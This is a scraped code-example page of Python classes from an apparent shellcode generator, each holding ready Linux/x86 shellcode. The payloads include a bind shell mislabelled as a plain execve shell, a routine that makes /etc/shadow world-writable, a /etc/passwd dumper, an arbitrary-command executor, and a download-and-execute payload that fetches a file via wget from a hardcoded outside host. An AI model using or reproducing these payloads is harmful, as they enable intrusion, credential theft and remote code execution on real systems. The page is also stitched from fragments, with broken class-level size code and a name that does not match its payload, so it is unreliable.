class Payload(Shellcode):
    Shellcode.info["author"] = "xmgv"
    Shellcode.info["name"] = "Linux/x86 execve /bin/sh shellcode"
    Shellcode.info["references"] = [
        "https://www.exploit-db.com/exploits/36398/",
        "https://xmgv.wordpress.com/2015/02/19/28/",
    ]
    Shellcode.info["size"] = 94 + Shellcode.getsize(kwargs["lport"])
    Shellcode.info["rawassembly"] = [
        "xor    %eax,%eax",
        "push   %eax",
        "push   $0x68732f2f",
        "push   $0x6e69622f",
        "mov    %esp,%ebx",
        "push   %eax",
        "push   %ebx",
        "mov    %esp,%ecx",
        "mov    $0xb,%al",
        "int    $0x80",
    ]

    def __init__(self, **kwargs):
        Shellcode.info["payload"] = [
            r"\x31\xdb\xf7\xe3\xb0\x66\xb3\x01\x52\x53"
            r"\x6a\x02\x89\xe1\xcd\x80\x89\xc6\xb0"
            r"\x66\x43\x52\x66\x68" + kwargs["lport"] +
            r"\x66\x53\x89\xe1\x6a\x10\x51\x56\x89"
            r"\xe1\xcd\x80\xb0\x66\xb3\x04\x52\x56\x89"
            r"\xe1\xcd\x80\xb0\x66\xb3\x05\x52\x52\x56\x89\xe1"
            r"\xcd\x80\x93\x31\xc9\xb1\x02"
            r"\xb0\x3f\xcd\x80\x49\x79\xf9\x92"
            r"\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e"
            r"\x89\xe3\x50\x53\x89\xe1\x50\x89\xe2\xb0\x0b\xcd\x80"
        ]
Beispiel #2
0
class Payload(Shellcode):
    Shellcode.info["author"] = "B3mB4m"
    Shellcode.info["name"] = "Linux/x86 - file reader"
    Shellcode.info["references"] = [
        "https://www.exploit-db.com/exploits/37285/"
    ]
    Shellcode.info["size"] = 19 + Shellcode.getsize(kwargs["file"])
    Shellcode.info["rawassembly"] = [
        "xor    %eax,%eax",
        "push   %eax",
        "push   $0x776f6461",
        "push   $0x68732f63",
        "push   $0x74652f2f",
        "mov    $0xf,%al",
        "mov    %esp,%ebx",
        "mov    $0x1ff,%cx",
        "int    $0x80",
        "xor    %eax,%eax",
        "inc    %eax",
        "int    $0x80",
    ]

    def __init__(self, **kwargs):
        Shellcode.info["payload"] = [
            r"\x31\xc0\x50" + kwargs["file"] + r"\xb0\x0f\x89\xe3\x66\xb9\xff"
            r"\x01\xcd\x80\x31\xc0\x40\xcd\x80"
        ]
class Payload(Shellcode):
    Shellcode.info["author"] = "B3mB4m"
    Shellcode.info["name"] = "Linux/x86 - file reader"
    Shellcode.info["references"] = [
        "https://www.exploit-db.com/exploits/37297/"
    ]
    Shellcode.info["size"] = 43 + Shellcode.getsize(kwargs["file"])
    Shellcode.info["rawassembly"] = [
        "xor    %ecx,%ecx",
        "xor    %eax,%eax",
        "xor    %edx,%edx",
        "push   %ecx",
        "mov    $0x5,%al",
        "push   $0x64777373",
        "push   $0x61702f63",
        "push   $0x74652f2f",
        "mov    %esp,%ebx",
        "int    $0x80",
        "mov    %ebx,%ecx",
        "mov    %eax,%ebx",
        "mov    $0x3,%al",
        "mov    $0xfff,%dx",
        "inc    %dx",
        "int    $0x80",
        "xor    %eax,%eax",
        "xor    %ebx,%ebx",
        "mov    $0x1,%bl",
        "mov    $0x4,%al",
        "int    $0x80",
        "xor    %eax,%eax",
        "mov    $0x1,%al",
        "int    $0x80",
    ]

    def __init__(self, **kwargs):
        Shellcode.info["payload"] = [
            r"\x31\xc9\x31\xc0\x31\xd2\x51\xb0\x05" + kwargs["file"] +
            r"\x89\xe3\xcd\x80\x89\xd9\x89\xc3\xb0"
            r"\x03\x66\xba\xff\x0f\x66\x42\xcd\x80"
            r"\x31\xc0\x31\xdb\xb3\x01\xb0\x04\xcd"
            r"\x80\x31\xc0\xb0\x01\xcd\x80"
        ]
Beispiel #4
0
class Payload(Shellcode):
	Shellcode.info["author"] = "Unkown"
	Shellcode.info["name"] = "Linux/x86 - exec shellcode"
	Shellcode.info["size"] = 36 + Shellcode.getsize(kwargs["execommand"])


	def __init__(self, **kwargs):
		db = [] 
		for x in kwargs["execommand"]:
			db.append("\\x"+x.encode("hex"))
		kwargs["execommand"] = "".join(db)



		Shellcode.info["payload"] = [
			r"\x6a\x0b\x58\x99\x52\x66\x68\x2d\x63\x89\xe7\x68\x2f"
			r"\x73\x68\x00\x68\x2f\x62\x69\x6e\x89\xe3\x52\xe8\x12"
			r"\x00\x00\x00"
			+kwargs["execommand"]+
			r"\x00\x57\x53\x89\xe1\xcd\x80"
		]
Beispiel #5
0
class Payload(Shellcode):
	Shellcode.info["author"] = "B3mB4m"
	Shellcode.info["name"] = "Linux x86 Download & Execute Shellcode"
	Shellcode.info["references"] = [
		"https://www.exploit-db.com/exploits/39389/"
	]
	Shellcode.info["size"] = \
			101 + Shellcode.getsize(kwargs["filename"])*2 + Shellcode.getsize([kwargs["url"]])
	

	Shellcode.info["rawassembly"] = [
		"xor eax,eax",
		"mov al,0x2",
		"int 0x80",
		"xor ebx,ebx",
		"cmp eax,ebx",
		"jz 0x47",
		"xor ecx,ecx",
		"xor ebx,ebx",
		"xor eax,eax",
		"push byte +0x5",
		"mov ecx,esp",
		"mov ecx,esp",
		"mov ebx,esp",
		"mov al,0xa2",
		"int 0x80",
		"xor ecx,ecx",
		"xor eax,eax",
		"push eax",
		"mov al,0xf",
		"push byte +0x68",
		"mov ebx,esp",
		"xor ecx,ecx",
		"mov cx,0x1ff",
		"int 0x80",
		"xor eax,eax",
		"push eax",
		"push byte +0x68",
		"mov ebx,esp",
		"push eax",
		"mov edx,esp",
		"push ebx",
		"mov ecx,esp",
		"mov al,0xb",
	 	"int 0x80",
		"xor eax,eax",
		"inc eax",
		"int 0x80",
		"push byte +0xb",
		"pop eax",
		"cdq",
		"push edx",
		"push dword 0x682f6365",
		"push dword 0x78652f2f",
		"push dword 0x6f692e62",
		"push dword 0x75687469",
		"push dword 0x672e6d34",
		"push dword 0x626d3362",
		"mov ecx,esp",
		"push edx",
		"push byte +0x74",
		"push dword 0x6567772f",
		"push dword 0x6e69622f",
		"push dword 0x7273752f",
		"mov ebx,esp",
		"push edx",
		"push ecx",
		"push ebx",
		"mov ecx,esp",
		"int 0x80",
	]

	
	def __init__(self, **kwargs): 
		Shellcode.info["payload"] = [
			r"\x31\xc0\xb0\x02\xcd\x80\x31\xdb\x39\xd8\x74"
			r"\x3b\x31\xc9\x31\xdb\x31\xc0\x6a\x05\x89\xe1"
			r"\x89\xe1\x89\xe3\xb0\xa2\xcd\x80\x31\xc9\x31"
			r"\xc0\x50\xb0\x0f"
			+kwargs["filename"]+
			r"\x89\xe3\x31\xc9\x66\xb9\xff\x01\xcd\x80\x31"
			r"\xc0\x50"
			+kwargs["filename"]+
			r"\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd"
			r"\x80\x31\xc0\x40\xcd\x80\x6a\x0b\x58\x99\x52"
			+kwargs["url"]+
			r"\x89\xe1\x52\x6a\x74\x68\x2f\x77\x67\x65\x68"
			r"\x2f\x62\x69\x6e\x68\x2f\x75\x73\x72\x89\xe3"
			r"\x52\x51\x53\x89\xe1\xcd\x80"

		]